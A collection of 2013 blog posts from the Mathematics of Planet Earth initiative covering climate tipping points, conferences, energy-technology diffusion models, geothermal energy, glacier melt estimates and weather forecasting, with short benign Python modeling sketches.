    There is a commonality to all these scenarios that can be described with mathematical methods from bifurcation theory. Mary Lou used the “Snowball Earth” scenario of the third example to illustrate this. According to geological evidence, this “mother of all tipping points” actually occurred on Earth not just once, but several times about 600 million years ago. Each complete glaciation lasted many millions of years and ended only when carbon dioxide from volcanic emissions accumulated in the atmosphere to levels much higher than today’s, leading to a monstrous greenhouse effect and a rapid transition from “snowball” to “hothouse” Earth. Mary Lou presented a fairly simple energy balance model that is capable of explaining the fact that both a moderate and a frozen climate state are possible and stable on the same planet, with the same solar output. These different climate states are possible since a planet with a moderate climate tends to have a low albedo (most of the sunlight is absorbed by oceans and continents and keeps the planet warm) while a frozen planet has a high albedo (sunlight is reflected back by ice packs and snowfields, keeping the planet cold). The model is flexible enough to explain also the transitions between “snowball” and “hothouse” states. Intriguingly, the so-called Cambrian explosion, during which many of today’s animal phyla first appeared, happened not long after these snowball episodes.
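
    To give a flavor of such an energy balance model, here is a minimal sketch (with illustrative parameter values of my own, not those used in the talk): the temperature tendency is absorbed sunlight, which depends on a temperature-dependent albedo, minus outgoing radiation. With these numbers the model has two stable equilibria, a frozen one and a warm one, separated by an unstable one.

        import numpy as np

        Q = 342.0          # mean incoming solar radiation, W/m^2
        sigma = 5.67e-8    # Stefan-Boltzmann constant
        eps = 0.62         # effective emissivity (crude greenhouse factor, assumed)

        def albedo(T):
            # warm planet: low albedo; frozen planet: high albedo; smooth transition between
            return 0.45 - 0.2 * np.tanh((T - 265.0) / 10.0)

        def net_flux(T):
            # absorbed sunlight minus outgoing longwave radiation (proportional to dT/dt)
            return Q * (1.0 - albedo(T)) - eps * sigma * T**4

        # Sign changes of the net flux locate the equilibria; with these parameters there
        # are three: frozen (stable), intermediate (unstable), and warm (stable).
        T = np.linspace(200.0, 320.0, 2401)
        f = net_flux(T)
        equilibria = T[:-1][np.sign(f[:-1]) != np.sign(f[1:])]
        print(equilibria)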

    Relatively simple mathematical models offer common explanations of such multiple stable states. Transitions between such states tend to be rapid and surprising, which is a scary thought. Mathematical insights can also lead to better detection mechanisms for such transitions and even suggest experiments to assess the resilience of an ecological system against random perturbations. For example, near such a transition point, a system will return to its stable state more slowly after a perturbation, and its response to a perturbation will also show more variance. Mary Lou specifically pointed to the work of Marten Scheffer and his co-authors on early warning signs for such critical transitions (Nature 2009, Science 2012).
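
    Here is a minimal sketch of how such early warning signs can be computed from data (an illustrative simulation, not the analysis of Scheffer and co-authors): as the recovery rate of a system weakens on the approach to a tipping point, both the variance and the lag-1 autocorrelation of its fluctuations increase.

        import numpy as np

        rng = np.random.default_rng(3)
        n, dt = 6000, 0.1
        r = np.linspace(1.0, 0.1, n)      # recovery rate slowly weakening toward the tipping point
        x = np.zeros(n)
        for t in range(1, n):
            # linearized dynamics near the stable state, driven by small random shocks
            x[t] = x[t - 1] - r[t] * x[t - 1] * dt + 0.05 * rng.standard_normal()

        def window_stats(series, w=1000):
            var, ac1 = [], []
            for i in range(0, len(series) - w + 1, w):
                seg = series[i:i + w]
                var.append(seg.var())
                ac1.append(np.corrcoef(seg[:-1], seg[1:])[0, 1])   # lag-1 autocorrelation
            return np.array(var), np.array(ac1)

        variance, autocorr = window_stats(x)
        print(variance)   # increases toward the end of the record
        print(autocorr)   # approaches 1 toward the end of the record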

    The mathematical sciences therefore can contribute to decision support for managers and policymakers. The speaker suggested that when ecological systems are observed and managed for sustainability, such a goal should include resilience. In mathematical terms, this means one should not just identify stable equilibrium states but also understand the “size” of their basin of attraction and their sensitivity to changes of external parameters.

    And here’s another term that I remember from this talk: mathematical scientists should show “interdisciplinary courage” and instill it in their students. This means not just a willingness to learn the language and problems of another discipline. In the privacy of their offices, mathematicians are already used to dead ends and unsuccessful attempts before coming up with good ideas. As members of interdisciplinary research teams, they also need to risk having “bad ideas in public.” That’s a resilience that all of us should acquire.

    Hans Engler
    Department of Mathematics and Statistics
    Georgetown University
    Washington, DC 20057

    Posted in Climate Modeling, Mathematics | Leave a comment

    “World Conference on Natural Resource Modeling,” Cornell University, June 18-21, 2013

    When I was just launching my career in the mid-1990s, I admit to being a bit jealous of some of my friends and colleagues in the sciences who seemed to be attending small professional meetings. Although I enjoyed (and continue to enjoy) the Joint Mathematics Meetings, I longed for a smaller, more focused meeting where I could engage in deeper discourse. A flier on a bulletin board caught my eye: a conference for mathematicians, economists, ecologists, fisheries and forestry modelers, and others, run by a group called the Resource Modeling Association. Given my interests in mathematics and the environment, I decided to attend. I realized immediately that I’d found my niche – and I now gladly invite you to join us. If you have been enjoying the JMM sessions on natural resource modeling, environmental modeling, and climate change modeling, you should check out this group. I have learned so much from the interdisciplinary talks, which have invited me to bring my expertise and ideas to a wide variety of projects that use mathematical modeling to contribute to our understanding of natural resources, climate change, conservation, fisheries management, forestry management, and more. The RMA meetings are held in the summer, and the venues are always gorgeous. The meetings alternate between locations in North America and locations outside of North America – last year, we were in Brisbane, Australia. This year, we’ll be in Ithaca, New York. Next year, we’ll be in Vilnius, Lithuania. My association with this group has enabled me to travel all over the world, visiting locations I never would have seen otherwise.

    Please join us at the World Conference on Natural Resource Modeling. This annual meeting is run by the Resource Modeling Association. In June 2013, the conference will be held at Cornell University.

    Cornell University is located in Ithaca, New York, in the heart of the Finger Lakes, a beautiful area of lakes, farms, wineries, and outstanding restaurants. Keynote speakers include Evan Cooch (Cornell University), who will talk on “Inferences about Coupling from Ecological Surveillance Monitoring: Application of Information Theory to Nonlinear Systems,” Carla Gomes (Cornell University), who will discuss “Computational Sustainability,” John Livernois (University of Guelph), who will speak on “Empirical Tests of Nonrenewable Resource Modeling: What Have We Learned?,” Michael Neubert (Woods Hole Oceanographic Institution), who will discuss “Strategic Spatial Models for Fisheries Management,” and Steven Phillips (AT&T Labs), with a talk on “Multiclass Modeling of Arctic Vegetation Distribution Shifts and Associated Feedbacks under Future Climate Change.”

    These are relatively small conferences (generally around 100 people from multiple disciplines) that provide remarkable opportunities for deep discussions of issues of mutual interest. We welcome your participation and you are invited to present a 20-minute paper (abstracts due in April). Generous prizes are awarded for the best student papers.

    The Resource Modeling Association was founded over 30 years ago by a group of mathematicians with interests in mathematical bioeconomics. The group started holding small workshops that quickly expanded to include ecologists, economists, and statisticians. The RMA’s mission is to encourage dialogue between scientists. The RMA works at the intersection of mathematical modeling, environmental science, and natural resource management. We formulate and analyze models to understand and inform the management of renewable and exhaustible resources. We are particularly concerned with the sustainable utilization of renewable resources and their vulnerability to anthropogenic and other disturbances.


    The RMA publishes the journal Natural Resource Modeling. NRM is an international journal devoted to mathematical modeling of natural resource systems. The major theme for the journal is the development and analysis of mathematical models as tools for resource management and policy development. The analysis may be applied to a wide variety of resources: renewable and exhaustible resources, terrestrial and marine resources, energy, land and soils, water resources, problems of pollution and residuals, managed biological populations, agriculture and fisheries, rangeland and forest, wildlife and wilderness, preservation of endangered species and genetic diversity.

    Catherine A. Roberts
    Any questions? Contact Catherine A. Roberts, Editor-in-Chief of Natural Resource Modeling at editor@resourcemodeling.org.

    Posted in Biodiversity, Conference Announcement, Ecology, Resource Management | Leave a comment

    Workshop “Mathematics of Climate Change, Related Natural Hazards and Risks”

    MPE2013 provides opportunities for networking with other disciplines and capacity building in regions of the world. One such project is the workshop “Mathematics of Climate Change, Related Natural Hazards and Risks,” which will take place in Guanajuato, Mexico, July 29 to August 2, 2013, as a satellite activity of the Mathematical Congress of the Americas.

    This workshop is the first to be organized jointly by the International Mathematical Union (IMU), the International Union of Geodesy and Geophysics (IUGG), and the International Union of Theoretical and Applied Mechanics (IUTAM), and is sponsored by the International Council for Science (ICSU), the International Council for Industrial and Applied Mathematics (ICIAM), and the Centro de Investigación en Matemáticas (CIMAT), Guanajuato, Mexico. It is supported by the regional office of ICSU for Latin America and the Caribbean (ROLAC), by two ICSU bodies, the World Climate Research Programme (WCRP) and Integrated Research on Disaster Risk (IRDR), by the U.S. National Academy of Sciences (NAS), and by the Academia Mexicana de Ciencias (AMC). The workshop is symbolic of the overarching impact of “Mathematics of Planet Earth” (MPE2013) on the mathematics, mechanics, and geophysics communities worldwide. The main objective of the workshop is to facilitate an international multidisciplinary discussion around the central topics of climate research, environmental hazards, and sustainable development. The workshop is targeted at a diverse group of participants, mainly coming from Central and South America.

    Mathematics, statistics, and mechanics are essential tools in geodesy and geophysics, and broadly defined quantitative mathematical training is an essential part of the preparation of the next generation of researchers dealing with climate change and natural hazards. Mathematical methods play a defining role in modern climate and natural hazards studies. The workshop will allow a diverse group of postdoctoral fellows and young researchers, including a large group of female scientists, mainly from Central and South America, to learn from and interact with internationally recognized leading experts in different aspects of the rapidly growing, multifaceted field of global environmental change. The workshop is expected to establish new research ties and specific projects within and outside the Americas.

    The scientific program consists of a series of lectures delivered by nine international leaders in the field of climate science and natural hazards. The lecture topics will be divided into three general themes. Each thematic block will be concluded with a roundtable, facilitated by one of the lecturers and a student, which will help summarize the material presented and draw conclusions. The workshop will provide ample opportunities for interaction and informal discussions.

    The workshop will focus on modern quantitative data- and model-driven approaches towards a predictive understanding of climate change, the effects of a changing climate on other natural hazards, and the related risks and socio-economic implications. Particular emphasis will be given to hazards in Central and South America.

    The workshop presentations will be structured around three main themes.

    Theme 1 — Methodology of the climate and natural hazards research: This theme will focus on the essential methodological aspects of climate science, with emphasis on the cross-links among geosciences, mathematics, and computer science. Data assimilation, statistical approaches to paleoclimate reconstruction, tracer-based techniques, large-scale numerical modeling, dynamical system theory, and Lagrangian transport in geophysical flows are some of the topics that will be presented by the leading experts in the respective fields. A comprehensive review of past Earth climates and climate forecast approaches will also be given.

    Theme 2 — Climate change and environmental hazards: This theme will review specific data sets and models that quantify the past and present changes in Earth’s climate and project them into the future. The speakers will give an overview of various environmental hazards related to the changing climate, their impacts, and mitigation strategies.

    Theme 3 — Socio-economic implications of climate change and extreme hydro-meteorological hazards: The changing climate and the related natural hazards and risks pose a multitude of pressing social, economic, and ethical questions. The lectures in this theme will provide a broader view of climate research and its intrinsic connections with many important aspects of human life and society.

    The confirmed speakers are Graciela Canziani, Susan Cutter, Oscar Velasco Fuentes, Michael Ghil, Eugenia Kalnay, Carlos R. Mechoso, George Philander, Bala Rajaratnam and Eli Tziperman.

    The Scientific Committee is composed of Susan Friedlander (IMU), Paul Linden (IUTAM) and Ilya Zaliapin (IUGG).

    The application deadline for participants is April 30, 2013. Priority will be given to young researchers from Latin America and the Caribbean. Apply here.

    Christiane Rousseau

    Posted in Workshop Announcement | Leave a comment

    MECC 2013 – Portugal, 21-28 March 2013

    Last week I attended “MECC 2013” – the International Conference and Advanced School Planet Earth, Mathematics of Energy and Climate Change, Portugal, 21-28 March 2013.

    The main part of the conference took place over two and a half days in the magnificent Calouste Gulbenkian Foundation building in the center of Lisbon (as I discovered while there, the same building is also the concert hall of the Gulbenkian Orchestra – one night I went to a fine performance of the Brahms Requiem). There were fourteen keynote speakers as well as “thematic sessions” covering numerous aspects of mathematics, statistics and economics associated with climate change, renewable energy and related themes. I was one of the keynote speakers, and talked about some recent work I have been doing on climate extremes (assessing the evidence that extreme events are becoming more frequent and to what extent this can be attributed to the human influence). Another keynote speaker was my North Carolina colleague Chris Jones, who gave his talk by video link from Chapel Hill – a venture that was largely successful, though there were some technical glitches.

    Associated with the conference was an Advanced School that included additional lectures by some of the keynote speakers at the University of Lisbon. I was one of the speakers at that as well, and so gave a morning of lectures to graduate students and faculty, mostly from the Statistics department of the university. It was pleasant to catch up with a number of old friends and colleagues from that department.

    Overall, it was an enjoyable experience and a good opportunity to learn about some of the work being done in Portugal on these important topics. The only disappointment was that there was not a larger attendance – the facilities of the Gulbenkian could easily have accommodated more people.

    Richard Smith
    University of North Carolina and SAMSI

    Posted in Climate, Conference Announcement, Energy | Leave a comment

    Mathematical Models Help Energy-efficient Technologies Take Hold in a Community

    Mathematical models can be used to study the spread of technological innovations among individuals connected to each other by a network of peer-to-peer influences, such as in a physical community or neighborhood. One such model was introduced in a paper published last week in the SIAM Journal on Applied Dynamical Systems.

    Authors N. J. McCullen, A. M. Rucklidge, C. S. E. Bale, T. J. Foxon, and W. F. Gale focus on one main application: the adoption of energy-efficient technologies in a population and, consequently, a means to control energy consumption. Using a network model for the adoption of energy technologies and behaviors, they evaluate the potential for using networks in a physical community to shape energy policy.

    The decision or motivation to adopt an energy-efficient technology is based on several factors, such as individual preferences, adoption by the individual’s social circle, and current societal trends. Since innovation is often not directly visible to peers in a network, social interaction—which communicates the benefits of an innovation—plays an important role. Even though the properties of interpersonal networks are not accurately known and tend to change, mathematical models can provide insights into how certain triggers can affect a population’s likelihood of embracing new technologies. The influence of social networks on behavior is well recognized in the literature outside of the energy policy domain: network intervention can be seen to accelerate behavior change.

    [Photo: Compact fluorescent light bulbs beat traditional light bulbs at energy efficiency]

    “Our model builds on previous threshold diffusion models by incorporating sociologically realistic factors, yet remains simple enough for mathematical insights to be developed,” says author Alastair Rucklidge. “For some classes of networks, we are able to quantify what strength of social network influence is necessary for a technology to be adopted across the network.”

    The model consists of a system of individuals (or households) who are represented as nodes in a network. The interactions that link these individuals—represented by the edges of the network—carry the probability or strength of the social connections. In the paper, all influences are taken to be symmetric and of equal weight. Each node is assigned a current state, indicating whether or not the individual has adopted the innovation. The model equations describe the evolution of these states over time.

    Households or individuals are modeled as decision makers connected by the network, for whom the uptake of technologies is influenced by two factors: the perceived usefulness (or utility) of the innovation to the individual, including subjective judgments, as well as barriers to adoption, such as cost. The total perceived utility is derived from a combination of personal and social benefits. Personal benefit is the perceived intrinsic benefit for the individual from the product. Social benefit depends on both the influence from an individual’s peer group and influence from society, which could be triggered by the need to fit in. The individual adopts the innovation when the total perceived utility outweighs the barriers to adoption.
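
    As a rough illustration of this kind of threshold model (a minimal sketch with invented parameters, not the authors’ code or their actual equations), consider nodes that adopt once personal benefit plus weighted peer and societal influence exceeds a fixed barrier:

        import numpy as np

        rng = np.random.default_rng(1)
        N = 100
        # a symmetric random network of equal-weight peer influences (illustrative)
        A = (rng.random((N, N)) < 0.05).astype(float)
        A = np.triu(A, 1)
        A = A + A.T
        deg = A.sum(axis=1)

        personal = rng.random(N)          # perceived intrinsic benefit for each node
        barrier = np.full(N, 0.8)         # barrier to adoption (e.g., cost)
        w_peer, w_soc = 0.4, 0.2          # weights of peer-group and societal influence
        adopted = rng.random(N) < 0.05    # a few initial adopters

        for step in range(50):
            # fraction of each node's neighbors who have adopted
            peer = np.divide(A @ adopted, deg, out=np.zeros(N), where=deg > 0)
            social = w_peer * peer + w_soc * adopted.mean()
            utility = personal + social                 # total perceived utility
            adopted = adopted | (utility > barrier)     # adopt once utility exceeds the barrier

        print(f"final adoption level: {adopted.mean():.0%}")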

    When the effect of each individual node is analyzed along with its influence over the entire network, the expected level of adoption is seen to depend on the number of initial adopters and the structure and properties of the network. Two factors in particular emerge as important to the successful spread of the innovation: the number of connections of nodes with their neighbors, and the presence of a high degree of common connections in the network.

    This study makes it possible to assess the variables that can increase the chances for success of an innovation in the real world. From a marketing standpoint, strategies could be designed to enhance the perceived utility of a product or item to consumers by modifying one or more of these factors. By varying different parameters, a government could help figure out the effect of different intervention strategies to expedite uptake of energy-efficient products, thus helping shape energy policy.

    “We can use this model to explore interventions that a local authority could take to increase adoption of energy-efficiency technologies in the domestic sector, for example by running recommend-a-friend schemes, or giving money-off vouchers,” author Catherine Bale explains. “The model enables us to assess the likely success of various schemes that harness both the householders’ trust in local authorities and peer influence in the adoption process. At a time when local authorities are extremely resource-constrained, tools to identify the interventions that will provide the biggest impact in terms of reducing household energy bills and carbon emissions could be of immense value to cities, councils and communities.”

    One of the motivations behind the study—modeling the effect of social networks in the adoption of energy technologies—was to help reduce energy consumption by cities, which utilize over two-thirds of the world’s energy, releasing more than 70% of global CO2 emissions. Local authorities can indirectly influence the provision and use of energy in urban areas, and hence help residents and businesses reduce energy demand through the services they deliver. “Decision-making tools are needed to support local authorities in achieving their potential contribution to national and international energy and climate change targets,” says author William Gale.

    Higher quantities of social data can help in making more accurate observations through such models. As author Nick McCullen notes, “To further refine these types of models, and make the results reliable enough to be used to guide the decisions of policy-makers, we need high quality data. Particularly, data on the social interactions between individuals communicating about energy innovations is needed, as well as the balance of factors affecting their decision to adopt.”

    Source article:
    Multiparameter Models of Innovation Diffusion on Complex Networks, N. J. McCullen, A. M. Rucklidge, C. S. E. Bale, T. J. Foxon, and W. F. Gale, SIAM Journal on Applied Dynamical Systems, 12(1), 515–532. (Online publish date: March 26, 2013). The source article is available for free access until June 27, 2013.

    About the Authors:
    Nick McCullen is a lecturer in the Department of Architecture and Civil Engineering at the University of Bath in the UK. Alastair Rucklidge is a professor and Head of the Department of Applied Mathematics at the University of Leeds in the UK. Tim Foxon is a reader in Sustainability & Innovation in the Sustainability Research Institute, School of Earth and Environment, at the University of Leeds. William Gale is a professor and Catherine Bale is a research fellow at the Energy Research Institute in the School of Process, Environmental and Materials Engineering at the University of Leeds. This work was funded under the EPSRC Energy Challenges for Complexity Science panel, grant EP/G059780/1.
    # # #

    About SIAM:
    The Society for Industrial and Applied Mathematics (SIAM), headquartered in Philadelphia, Pennsylvania, is an international society of over 14,000 individual members, including applied and computational mathematicians and computer scientists, as well as other scientists and engineers. Members from 85 countries are researchers, educators, students, and practitioners in industry, government, laboratories, and academia. The Society, which also includes nearly 500 academic and corporate institutional members, serves and advances the disciplines of applied mathematics and computational science by publishing a variety of books and prestigious peer-reviewed research journals, by conducting conferences, and by hosting activity groups in various areas of mathematics. SIAM provides many opportunities for students including regional sections and student chapters. Further information is available here.
    [Reporters are free to use this text as long as they acknowledge SIAM]

    Posted in Energy, Mathematics, Resource Management | 1 Comment

    Data, Mathematics, and the Social Sciences

    Last September the White House honored Michael Flowers, New York’s Director of Policy and Strategic Planning Analytics, as a Champion of Change. Flowers’ team figures out ways to combine common sense with the analysis of data, which is now easily available on the internet, to efficiently solve some of New York’s vexing problems, including combating prescription drug abuse and property fraud and figuring out which restaurants are illegally dumping grease into the city’s sewers.

    This is an example of new tools that are now available largely because of the internet.

    It may be true that the internet is killing some industries. Print newspapers may be dying and bookstores are failing, but the internet is creating or transforming others. I was really impressed by the simple but powerful idea that flu outbreaks can be identified by studying Google searches. And now Mayor Bloomberg’s low-budget office is solving high-level problems that have been largely intractable until now.

    Here is an example with a quote from a press release from the NYC Mayor’s office.

    “To identify properties with a higher-risk of fire death, for instance, the Policy and Strategic Planning Analytics Team combined FDNY data with information on illegal housing conversion complaints, foreclosures, tax liens and neighborhood demographics. The Analytics Team then created a risk assessment model that provides a list of the highest risk properties with illegal conversion complaints. These high-risk locations are jointly inspected within 48 hours by the Department of Buildings and FDNY, and the joint inspection team uncovered unsafe conditions for inhabitants 70 percent of the time using this predictive model … a five-fold increase in effectiveness over typical inspections.”

    See also this article in The New York Times.

    To me, these interesting ways in which math is used to address social issues are exactly the theme of MPE2013. I’d love to hear of more examples like these.

    Brian Conrey
    Director, American Institute of Mathematics

    Posted in General, Public Health, Social Systems | Leave a comment

    Geothermal Energy Harvesting

    As energy needs are expected to surpass the energy content of available fossil-fuel resources in this century, interest in renewable energy sources has increased in the past decade. One area of interest is geothermal energy harvesting. In these systems, energy is retrieved from the Earth and used on the surface either directly, for example to provide heat to a community, or after conversion to electrical energy. However, as the fluid moves through the piping from its deepest depth to the surface, energy is transferred from the fluid to the surrounding soil. In conventional deep wells (depths of 4 km or more), this transfer results in a transmission loss of energy, while in shallower residential geothermal heat-pump systems (depths of about 100 m), this transfer is the main energy-harnessing mechanism.

    We have recently applied some classical mathematical modeling approaches to these systems. For example, with my collaborator T. Baumann at the Technical University of Munich (TUM), we described the temperature attenuation in the fluid from a deep aquifer at a geothermal facility in the Bavarian Molasse Basin [1]. Energy losses depend on the production rate of the facility (potentially up to 30%). Our approach takes advantage of the small aspect ratio of the well radius to its length, and of the fact that the dominant energy balance is between axial energy transport in the fluid and radial transport in the soil. We find that the dominant eigenfunction for the radial problem in the fluid captures this balance, and that the corresponding eigenvalue provides the appropriate constant relating the effective axial energy flux to the temperature drop over the length of the well. In the design of these wells, this constant has traditionally been prescribed from phenomenological experience.

    This approach may be quite useful in the construction of shallow residential geothermal heat-pump systems. Although these systems cost about a third as much to operate as conventional heating and cooling systems, they are currently not economically viable, since the installation cost of the wells depends significantly on the well depth required to meet the power needs of the residence. These systems are used year round, with energy deposited into the soil from the residence in the summer months and then retrieved in the winter months for heating.

    Recently, a group of undergraduate students participated in the NSF-funded Research Experiences for Undergraduates program at Worcester Polytechnic Institute to work on this problem, which was brought to us by the New England Geothermal Professionals Association. With our modeling approach, the eigenvalue and the axial behavior give a characteristic length for the well, over which an energy attenuation of 1/e is achieved. Hence, three of these characteristic lengths are needed to attain over 90% of the possible energy available. We are currently extending these approaches to horizontal piping systems.
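
    As a quick check of this rule of thumb (using the exponential attenuation implied by the dominant-eigenvalue argument above): if the fraction of the available energy harvested over a depth z is 1 − exp(−z/L), where L is the characteristic length, then a well of depth z = 3L captures 1 − e^(−3) ≈ 0.95, i.e., over 90% of the available energy.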

    B.S. Tilley
    Department of Mathematical Sciences
    Worcester Polytechnic Institute
    Worcester, MA 01609

    [1] B.S. Tilley and T. Baumann, “On temperature attenuation in staged open-loop wells”, Renewable Energy, 48 416-423: (2012)

    Posted in Renewable Energy | Leave a comment

    Celebrate the Mathematics of Sustainability

    The earth provides us with an astonishing variety of resources. For humanity to flourish, we must balance our human needs, such as those for energy, clean air, fresh water, and adequate food, with the availability of these resources. And we must do so while operating within the complex constraints imposed by the laws of nature and the perhaps equally complex “laws” of human behavior. So sustainability involves environmental, social, and economic aspects, all of which are interconnected.

    April is Mathematics Awareness Month (MAM). This year’s theme is Mathematics of Sustainability, which explores how mathematics helps us better understand these complex questions. Society and individuals will need to make challenging choices; mathematics provides us with tools to make informed decisions. Given the importance and timeliness of this year’s theme, the Advisory Committee for MAM has organized two nationwide initiatives.

    *Sustainability Counts!

    This educational initiative provides a range of model lessons for K-16 math educators that link math with sustainability. In honor of Mathematics Awareness Month, we invite educators to teach a lesson on this topic. The showcase lesson is the Sustainability Counts Energy Challenge in which students both learn about the mathematics of energy use at their institution and then develop and implement an action plan to reduce energy use. By tracking how much energy is saved nationally, students will see that while sustainability starts with individual effort, creating a sustainable society requires large-scale cooperation across the nation and around the world.

    We encourage our international colleagues in MPE to share with their colleagues in mathematics education this idea of using sustainability to inspire student interest in mathematics.

    *Speakers’ Bureau

    This is a group of mathematicians, scientists and sustainability professionals who are available to speak to school audiences and community groups on various topics related to the mathematics of sustainability. The bureau was created in conjunction with the Mathematics of Planet Earth (MPE) 2013 initiative. If you would like to become part of the group, please sign up to become a speaker.

    About Math Awareness Month and JPBM:

    Mathematics Awareness Month (MAM), held each year in April, is sponsored by the Joint Policy Board for Mathematics (JPBM) to increase public understanding of and appreciation for mathematics.

    At the MAM Website you can find theme essays, related resources, a blog, and download a copy of the 2013 poster.

    Activities for Mathematics Awareness Month generally are organized on local, state and regional levels by college and university departments, institutional public information offices, student groups, and related associations and interest groups. If you organize an activity, please tell us about it.

    The JPBM is a collaborative effort of the American Mathematical Society (AMS), the American Statistical Association (ASA), the Mathematical Association of America (MAA), and the Society for Industrial and Applied Mathematics (SIAM).

    Contact:
    Victor Donnay
    MAM 2013 Committee Chair
    Bryn Mawr College
    mathaware2013@gmail.com

    Posted in Mathematics, Sustainable Development | 1 Comment

    Our blog is on spring break. We’ll be back on Monday, April 1.

    Posted in General | Leave a comment

    The Melting of Glaciers

    We regularly hear warnings from scientists about the significant rise in sea level that will occur before the end of the century. The worst-case scenarios usually predict a rise of less than a meter by 2100.

    Where does this number come from? The common answer is that the rise in sea level comes both from the melting of glaciers and from the thermal expansion of seawater as its temperature increases.

    I did the exercise of calculating the volume of the glaciers of Greenland and Antarctica. The area of the glaciers of Greenland is 1,775,637 km^2 and their volume is 2,850,000 km^3. The area of Antarctica is 14,000,000 km^2, and the thickness of the ice is up to 3 km. If we take a mean thickness of 2 km, this gives a volume of 28,000,000 km^3.

    Hence, the total volume of ice in the glaciers of Greenland and Antarctica is of the order of 30,850,000 km^3. Now, the area of the oceans is 335,258,000 km^2. Hence, if all glaciers were to melt and produce the same volume of water (in fact a little less, although the water will also expand as its temperature increases), we would have a rise in sea level of 92 meters!
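
    For readers who want to reproduce the arithmetic, here is the same back-of-the-envelope calculation (using the figures quoted above) as a few lines of Python:

        greenland_km3 = 2_850_000
        antarctica_km3 = 14_000_000 * 2        # area in km^2 times an assumed mean thickness of 2 km
        ocean_area_km2 = 335_258_000

        rise_km = (greenland_km3 + antarctica_km3) / ocean_area_km2
        print(f"sea level rise: {rise_km * 1000:.0f} m")   # about 92 m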

    Can we explain the difference? Of course, my model is very rough. It is not clear that all the new water would stay in the oceans; some could percolate into the soil, and some could evaporate into the atmosphere. I recently put the question to Hervé Le Treut, of the Institut Pierre Simon Laplace in Paris. His answer was that the ice melts slowly, so it would take much more than 90 years for all the glaciers to melt.

    But this raises another question. Why do we stop our predictions at 2100? Is sustainability no longer necessary past 2100?

    Christiane Rousseau

    Posted in Climate Change | Leave a comment

    Mathematical Sciences in the 21st Century

    Although in the eyes of an uninformed observer the mathematical sciences have an invisible presence in everyday life, recent developments in modern communications, transportation, science, engineering, technology, medicine, manufacturing, security, and finance have all been enabled by advances in the mathematical sciences. Mathematics, statistics, operations research, and theoretical computer science have been fundamental to many of the recent advances in our modern society.

    A distinguished panel of experts, gathered by the National Academies, has recently produced a very interesting and informative publication: Fueling Innovation and Discovery: The Mathematical Sciences in the 21st Century. This publication was released by the National Academies in advance of their report The Mathematical Sciences in 2025, developed with support from the National Science Foundation.
    The publication succinctly presents a dozen examples, discussing the mathematics involved in the sequencing of the human genome, medical imaging, medical diagnosis, information technology, and animation, as well as in the computational modeling of tsunamis, traffic, and the spread of pollutants. While by no means comprehensive, the selection of topics gives the reader an important view of various areas of the mathematical sciences that have significantly impacted new technologies and industries and our understanding of the world. At the same time, the examples show the universality of mathematics, as the same concepts yield new insights in a multitude of disciplines and areas of human endeavor.

    So why are the mathematical sciences still invisible in everyday life? Actually, they are not; the uninformed observer only needs the curiosity to understand the sources of advancement in our modern technological society, and publications like this one can definitely help.

    Posted in General, Mathematics | Leave a comment

    The Mathematics of Sustainability

    Opinion article by Simon Levin, published in the Notices of the American Mathematical Society, April 2013, pp. 392–393.

    Click here to download the full text of the article.

    Posted in General, Sustainable Development | Leave a comment

    A View of Prediction of the Atmosphere

    This morning I heard a lecture by Rick Anthes, president emeritus of UCAR and former director of NCAR. His talk was entitled “Butterflies and Demons,” and the subject was the predictability of weather and climate. He was a witness to, and participant in, the development of numerical weather prediction in the form in which it exists today at weather centers worldwide. It was a particularly interesting and provocative talk.

    Numerical weather prediction proved its worth in the forecasts of the track and severity of Hurricane Sandy. Without the forecasts, the property damage and loss of life would have been much worse than they were. One might compare the effect of Sandy to the Galveston flood of 1900, for which there was no warning and in which thousands of people lost their lives. Sandy was the only hurricane in history that made landfall on the Atlantic coast from the east. Dr. Anthes showed a slide with the tracks of every Atlantic coast hurricane since 1850. Most tracked up the coast, and those that went east into the Atlantic did not return. One might reasonably question the reliability of data extending back to the age of sail, but no statistical method based on previous experience could possibly have predicted that a hurricane would go northeast from the coast and then return westward to make landfall, since that had never happened before.

    At this point it is important to note that the national weather centers make more than a single numerical forecast. In addition to a main central forecast, they make a collection of forecasts, numbering in the hundreds at some weather centers, each differing slightly in some respect, usually in the initial conditions. They refer to such collections of simultaneous forecasts as “ensembles.” The spread among the ensemble members is expected to reflect uncertainty in the forecast. Dr. Anthes showed the ensemble produced by the European Center for Medium Range Weather Forecasting (ECMWF) of predicted tracks for Sandy. Nearly all of them exhibited the correct behavior. Perhaps five of the several hundred tracks predicted by the ensemble members led out into the Atlantic and did not return.

    Dr. Anthes said that accurate forecasts such as the ones issued by ECMWF for the track of Sandy would have been impossible 20 years ago. He emphasized the fact that advances in science, in the form of improved numerical technique, data assimilation and understanding of rain and clouds, along with spacecraft as well as earthbound instruments and data processing techniques may well have saved thousands of lives and billions of dollars in property damage.

    It was certainly good to see benefits to society that come from my corner of the world of scientific research. It’s the received wisdom in the world of hurricane forecasting that predictions of tracks have improved considerably over the years, while improvement in prediction of intensity has been much slower. Dr. Anthes’ graph showing improvement of skill in forecasting of hurricane tracks since 1980 didn’t strike me as being quite so impressive as other aspects of weather forecasting. If I read the graph correctly, the accuracy of present two-day storm track forecasts is about equivalent to the accuracy of one-day storm track predictions in 1980. By contrast, the graph shown by Dr. Anthes of global weather forecast skill showed that our 5-day forecasts today are as accurate as our 2-day forecasts were in 1995.

    Dr. Anthes gave three talks at Oregon State during his visit, and this was the only one I was able to attend. The talk I heard was billed as the most technical of the three, and per his introduction, it wasn’t nearly as technical as the usual seminars in the series given by the Physics of Oceans and Atmospheres group. There were no equations, but much scientific insight and lots to think about.

    Robert Miller
    College of Earth, Ocean, and Atmospheric Sciences
    Oregon State University
    miller@coas.oregonstate.edu

    Posted in Atmosphere, Meteorology | Leave a comment

    AWM Research Symposium at Santa Clara University, March 16

    Last Saturday, at the Association for Women in Mathematics (AWM) Research Symposium at Santa Clara University, Inez Fung gave a wonderfully spirited lecture on “Climate Math.” She described some of the early history of computing and forecasting climate and some of the new challenges in projecting future climate change. She addressed the question of whether recent weather events suggest that the weather has become chaotic and whether this is related to climate change, offering some interesting insights from the Lorenz butterfly attractor.

    This talk was a preview of the South African MPE2013 Simons Public Lecture, which will be delivered by Inez Fung on March 26, 2013 in Cape Town.

    Interestingly, the third plenary talk at the symposium was given by Lauren Williams, and it also had a tie to MPE2013. The title of the talk was “Grassmannians and Shallow Water Waves.” The talk described some interesting connections between the geometry of water waves and combinatorics. When I walked into the recital hall to attend this lecture, I thought the picture on the screen looked familiar. It turned out to be one of the pictures that appeared in our blog post of February 28, in the article about the work of Mark Ablowitz and Douglas Baldwin.

    So the MPE2013 movement is spreading out in many ways.

    Estelle Basor

